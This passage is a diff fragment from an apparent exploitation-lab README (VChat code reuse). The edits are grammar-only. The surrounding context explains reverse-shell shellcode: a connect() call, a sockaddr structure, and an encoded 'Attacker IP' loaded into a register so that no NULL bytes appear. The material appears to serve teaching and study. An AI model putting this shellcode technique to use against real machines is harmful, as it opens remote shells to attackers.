xinwenfu/VChat_GTER_CodeReuse/README.md

 call ebx                ; Call connect()
 ```

 1) We first create a `sockaddr_in`/`sockaddr` structure on the stack (That is passed as a `sockaddr`).
-We add a constant value to the Hex representation of the IP address to encode the IP address, and later subtract the constant during the shellcode's execution to decode it.
+We add a constant value to the Hex representation of the IP address to encode the IP address and later subtract the constant during the shellcode's execution to decode it.
 This is to eliminate any NULL bytes (0x0).
-The IP is placed on the stack in Little-Endian notation (Reverse Order), and the tuple (IP, Port) is held in the `sa_data` field of the `sockaddr` structure; with the `sa_family` value holding the protocol type.
+The IP is placed on the stack in Little-Endian notation (Reverse Order), and the tuple (IP, Port) is held in the `sa_data` field of the `sockaddr` structure, with the `sa_family` value holding the protocol type.
    ```
    mov ebx,0x6955fe15      ; Attacker IP: 192.168.0.20.
 In reverse order:
                            ; hex(20) = 0x14, 0x14 + 0x55 => 0x69